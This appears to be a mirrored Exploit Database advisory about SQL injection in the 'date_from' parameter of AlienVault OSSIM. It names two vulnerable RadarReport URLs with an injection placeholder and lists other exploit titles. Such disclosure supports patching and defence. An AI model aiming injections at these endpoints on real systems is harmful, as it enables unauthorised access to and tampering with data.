Alienvault Open Source SIEM (OSSIM) 3.1 – ‘date_from’ Multiple SQL Injections

Exploit Database
106 阅读

作者： Yu-Chi Ding

日期： 2013-10-02
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/38781/

source: https://www.securityfocus.com/bid/62790/info

Open Source SIEM (OSSIM) is prone to multiple SQL-injection vulnerabilities.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Open Source SIEM (OSSIM) 4.3.0 and prior are vulnerable. 

http://www.example.com/RadarReport/radar-iso27001-potential.php?date_from=%Inject_Here%

http://www.example.com/RadarReport/radar-iso27001-A12IS_acquisition-pot.php?date_from=%Inject_Here%

last Exploits
Alienvault Open Source SIEM (OSSIM) 3.1 – ‘date_from’ Multiple SQL Injections的更多信息

Small CRM 2.0 – Authentication Bypass：
My Kazaam Notes Management System – Multiple Vulnerabilities：
Ajenti 2.1.31 – Remote Code Execution：
Tourismscripts Hotel Portal – ‘hotel_city’ HTML Injection：
Virtual Airlines Manager 2.6.2 – ‘multiple’ SQL Injection：
VU Mass Mailer – Authentication Bypass：
WordPress Plugin Q and A (Focus Plus) FAQ 1.3.9.7 – Multiple Vulnerabilities：
PHP Appointment Booking Script – Authentication Bypass：